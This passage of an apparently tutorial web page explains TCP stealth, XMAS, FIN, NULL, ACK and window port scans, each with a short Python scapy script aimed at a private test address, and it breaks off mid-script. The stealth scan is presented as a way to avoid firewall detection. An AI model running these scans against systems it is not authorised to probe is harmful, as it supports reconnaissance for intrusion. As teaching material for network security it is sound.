</tbody></table>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>TCP stealth scan<br />
</strong></span><br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin3.jpg" width="621" /><br />
This technique is similar to the TCP connect scan. The client sends a
TCP packet with the SYN flag set and the port number to connect to. If
the port is open, the server responds with the SYN and ACK flags inside a
TCP packet. But this time the client sends a RST flag in a TCP packet
and not RST+ACK, which was the case in the TCP connect scan. This
technique is used to avoid port scanning detection by firewalls.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin4.jpg" width="621" /><br />
The closed port check is same as that of TCP connect scan. The server
responds with an RST flag set inside a TCP packet to indicate that the
port is closed on the server<br />
The Code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_469935">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
</td><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">80</code></div>
<div class="line number10 index9 alt1">
</div>
<div class="line number11 index10 alt2">
<code class="python plain">stealth_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(sport</code><code class="python keyword">=</code><code class="python plain">src_port,dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"S"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number12 index11 alt1">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(stealth_scan_resp))</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number13 index12 alt2">
<code class="python functions">print</code> <code class="python string">"Filtered"</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">elif</code><code class="python plain">(stealth_scan_resp.haslayer(TCP)):</code></div>
<div class="line number15 index14 alt2">
<code class="python keyword">if</code><code class="python plain">(stealth_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x12</code><code class="python plain">):</code></div>
<div class="line number16 index15 alt1">
<code class="python plain">send_rst </code><code class="python keyword">=</code> <code class="python plain">sr(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(sport</code><code class="python keyword">=</code><code class="python plain">src_port,dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"R"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number17 index16 alt2">
<code class="python functions">print</code> <code class="python string">"Open"</code></div>
<div class="line number18 index17 alt1">
<code class="python keyword">elif</code> <code class="python plain">(stealth_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x14</code><code class="python plain">):</code></div>
<div class="line number19 index18 alt2">
<code class="python functions">print</code> <code class="python string">"Closed"</code></div>
<div class="line number20 index19 alt1">
<code class="python keyword">elif</code><code class="python plain">(stealth_scan_resp.haslayer(ICMP)):</code></div>
<div class="line number21 index20 alt2">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">int</code><code class="python plain">(stealth_scan_resp.getlayer(ICMP).</code><code class="python functions">type</code><code class="python plain">)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code> <code class="python keyword">and</code> <code class="python functions">int</code><code class="python plain">(stealth_scan_resp.getlayer(ICMP).code) </code><code class="python keyword">in</code> <code class="python plain">[</code><code class="python value">1</code><code class="python plain">,</code><code class="python value">2</code><code class="python plain">,</code><code class="python value">3</code><code class="python plain">,</code><code class="python value">9</code><code class="python plain">,</code><code class="python value">10</code><code class="python plain">,</code><code class="python value">13</code><code class="python plain">]):</code></div>
<div class="line number22 index21 alt1">
<code class="python functions">print</code> <code class="python string">"Filtered"</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>XMAS scan<br />
</strong></span><br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin5.jpg" width="621" /><br />
In the XMAS scan, a TCP packet with the PSH, FIN, and URG flags set,
along with the port to connect to, is sent to the server. If the port is
open, then there will be no response from the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin6.jpg" width="621" /><br />
If the server responds with the RST flag set inside a TCP packet, the port is closed on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin7.jpg" width="621" /><br />
If the server responds with the ICMP packet with an ICMP unreachable
error type 3 and ICMP code 1, 2, 3, 9, 10, or 13, then the port is
filtered and it cannot be inferred from the response whether the port is
open or closed.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_77213">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
</td><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">80</code></div>
<div class="line number10 index9 alt1">
</div>
<div class="line number11 index10 alt2">
<code class="python plain">xmas_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"FPU"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number12 index11 alt1">
<code class="python keyword">if</code> <code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(xmas_scan_resp))</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number13 index12 alt2">
<code class="python functions">print</code> <code class="python string">"Open|Filtered"</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">elif</code><code class="python plain">(xmas_scan_resp.haslayer(TCP)):</code></div>
<div class="line number15 index14 alt2">
<code class="python keyword">if</code><code class="python plain">(xmas_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x14</code><code class="python plain">):</code></div>
<div class="line number16 index15 alt1">
<code class="python functions">print</code> <code class="python string">"Closed"</code></div>
<div class="line number17 index16 alt2">
<code class="python keyword">elif</code><code class="python plain">(xmas_scan_resp.haslayer(ICMP)):</code></div>
<div class="line number18 index17 alt1">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">int</code><code class="python plain">(xmas_scan_resp.getlayer(ICMP).</code><code class="python functions">type</code><code class="python plain">)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code> <code class="python keyword">and</code> <code class="python functions">int</code><code class="python plain">(xmas_scan_resp.getlayer(ICMP).code) </code><code class="python keyword">in</code> <code class="python plain">[</code><code class="python value">1</code><code class="python plain">,</code><code class="python value">2</code><code class="python plain">,</code><code class="python value">3</code><code class="python plain">,</code><code class="python value">9</code><code class="python plain">,</code><code class="python value">10</code><code class="python plain">,</code><code class="python value">13</code><code class="python plain">]):</code></div>
<div class="line number19 index18 alt2">
<code class="python functions">print</code> <code class="python string">"Filtered"</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>FIN scan<br />
</strong></span><br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin8.jpg" width="621" /><br />
The FIN scan utilizes the FIN flag inside the TCP packet, along with
the port number to connect to on the server. If there is no response
from the server, then the port is open.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin9.jpg" width="621" /><br />
If the server responds with an RST flag set in the TCP packet for the
FIN scan request packet, then the port is closed on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin10.jpg" width="621" /><br />
An ICMP packet with ICMP type 3 and code 1, 2, 3, 9, 10, or 13 in
response to the FIN scan packet from the client means that the port is
filtered and the port state cannot be found.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_976094">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
</td><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">80</code></div>
<div class="line number10 index9 alt1">
</div>
<div class="line number11 index10 alt2">
<code class="python plain">fin_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"F"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number12 index11 alt1">
<code class="python keyword">if</code> <code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(fin_scan_resp))</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number13 index12 alt2">
<code class="python functions">print</code> <code class="python string">"Open|Filtered"</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">elif</code><code class="python plain">(fin_scan_resp.haslayer(TCP)):</code></div>
<div class="line number15 index14 alt2">
<code class="python keyword">if</code><code class="python plain">(fin_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x14</code><code class="python plain">):</code></div>
<div class="line number16 index15 alt1">
<code class="python functions">print</code> <code class="python string">"Closed"</code></div>
<div class="line number17 index16 alt2">
<code class="python keyword">elif</code><code class="python plain">(fin_scan_resp.haslayer(ICMP)):</code></div>
<div class="line number18 index17 alt1">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">int</code><code class="python plain">(fin_scan_resp.getlayer(ICMP).</code><code class="python functions">type</code><code class="python plain">)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code> <code class="python keyword">and</code> <code class="python functions">int</code><code class="python plain">(fin_scan_resp.getlayer(ICMP).code) </code><code class="python keyword">in</code> <code class="python plain">[</code><code class="python value">1</code><code class="python plain">,</code><code class="python value">2</code><code class="python plain">,</code><code class="python value">3</code><code class="python plain">,</code><code class="python value">9</code><code class="python plain">,</code><code class="python value">10</code><code class="python plain">,</code><code class="python value">13</code><code class="python plain">]):</code></div>
<div class="line number19 index18 alt2">
<code class="python functions">print</code> <code class="python string">"Filtered"</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>NULL scan:<br />
</strong></span><br />
<img alt="" height="276" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin11.jpg" width="618" /><br />
In a NULL scan, no flag is set inside the TCP packet. The TCP packet
is sent along with the port number only to the server. If the server
sends no response to the NULL scan packet, then that particular port is
open.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin12.jpg" width="621" /><br />
If the server responds with the RST flag set in a TCP packet, then the port is closed on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin13.jpg" width="621" /><br />
An ICMP error of type 3 and code 1, 2, 3, 9, 10, or 13 means the port is filtered on the server.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_115605">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
</td><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">80</code></div>
<div class="line number10 index9 alt1">
</div>
<div class="line number11 index10 alt2">
<code class="python plain">null_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python plain">""),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number12 index11 alt1">
<code class="python keyword">if</code> <code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(null_scan_resp))</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number13 index12 alt2">
<code class="python functions">print</code> <code class="python string">"Open|Filtered"</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">elif</code><code class="python plain">(null_scan_resp.haslayer(TCP)):</code></div>
<div class="line number15 index14 alt2">
<code class="python keyword">if</code><code class="python plain">(null_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x14</code><code class="python plain">):</code></div>
<div class="line number16 index15 alt1">
<code class="python functions">print</code> <code class="python string">"Closed"</code></div>
<div class="line number17 index16 alt2">
<code class="python keyword">elif</code><code class="python plain">(null_scan_resp.haslayer(ICMP)):</code></div>
<div class="line number18 index17 alt1">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">int</code><code class="python plain">(null_scan_resp.getlayer(ICMP).</code><code class="python functions">type</code><code class="python plain">)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code> <code class="python keyword">and</code> <code class="python functions">int</code><code class="python plain">(null_scan_resp.getlayer(ICMP).code) </code><code class="python keyword">in</code> <code class="python plain">[</code><code class="python value">1</code><code class="python plain">,</code><code class="python value">2</code><code class="python plain">,</code><code class="python value">3</code><code class="python plain">,</code><code class="python value">9</code><code class="python plain">,</code><code class="python value">10</code><code class="python plain">,</code><code class="python value">13</code><code class="python plain">]):</code></div>
<div class="line number19 index18 alt2">
<code class="python functions">print</code> <code class="python string">"Filtered"</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>TCP ACK scan<br />
</strong></span><br />
The TCP ACK scan is not used to find the open or closed state of a
port; rather, it is used to find if a stateful firewall is present on
the server or not. It only tells if the port is filtered or not. This
scan type cannot find the open/closed state of the port.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin14.jpg" width="621" /><br />
A TCP packet with the ACK flag set and the port number to connect to
is sent to the server. If the server responds with the RSP flag set
inside a TCP packet, then the port is unfiltered and a stateful firewall
is absent.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin15.jpg" width="621" /><br />
If the server doesn’t respond to our TCK ACK scan packet or if it
responds with a TCP packet with ICMP type 3 or code 1, 2, 3, 9, 10, or
13 set, then the port is filtered and a stateful firewall is present.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_111953">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
</td><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">80</code></div>
<div class="line number10 index9 alt1">
</div>
<div class="line number11 index10 alt2">
<code class="python plain">ack_flag_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"A"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number12 index11 alt1">
<code class="python keyword">if</code> <code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(ack_flag_scan_resp))</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number13 index12 alt2">
<code class="python functions">print</code> <code class="python string">"Stateful firewall presentn(Filtered)"</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">elif</code><code class="python plain">(ack_flag_scan_resp.haslayer(TCP)):</code></div>
<div class="line number15 index14 alt2">
<code class="python keyword">if</code><code class="python plain">(ack_flag_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x4</code><code class="python plain">):</code></div>
<div class="line number16 index15 alt1">
<code class="python functions">print</code> <code class="python string">"No firewalln(Unfiltered)"</code></div>
<div class="line number17 index16 alt2">
<code class="python keyword">elif</code><code class="python plain">(ack_flag_scan_resp.haslayer(ICMP)):</code></div>
<div class="line number18 index17 alt1">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">int</code><code class="python plain">(ack_flag_scan_resp.getlayer(ICMP).</code><code class="python functions">type</code><code class="python plain">)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code> <code class="python keyword">and</code> <code class="python functions">int</code><code class="python plain">(ack_flag_scan_resp.getlayer(ICMP).code) </code><code class="python keyword">in</code> <code class="python plain">[</code><code class="python value">1</code><code class="python plain">,</code><code class="python value">2</code><code class="python plain">,</code><code class="python value">3</code><code class="python plain">,</code><code class="python value">9</code><code class="python plain">,</code><code class="python value">10</code><code class="python plain">,</code><code class="python value">13</code><code class="python plain">]):</code></div>
<div class="line number19 index18 alt2">
<code class="python functions">print</code> <code class="python string">"Stateful firewall presentn(Filtered)"</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>TCP window scan<br />
</strong></span><br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin16.jpg" width="621" /><br />
A TCP window scan uses the same technique as that of TCP ACK scan. It
also sends a TCP packet with the ACK flag set and the port number to
connect to. But this scan type can be used to find the state of the port
on the server. In a TCP ACK scan, an RST indicates an unfiltered state.
But in a TCP windows scan, when an RST is received from the server, it
then checks the value of the windows size. If the value of window size
is positive, then the port is open on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin17.jpg" width="621" /><br />
If the windows size of the TCP packet with the RST flag set to zero, then the port is closed on the server.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_244756">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
</td><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">80</code></div>
<div class="line number10 index9 alt1">
</div>
<div class="line number11 index10 alt2">
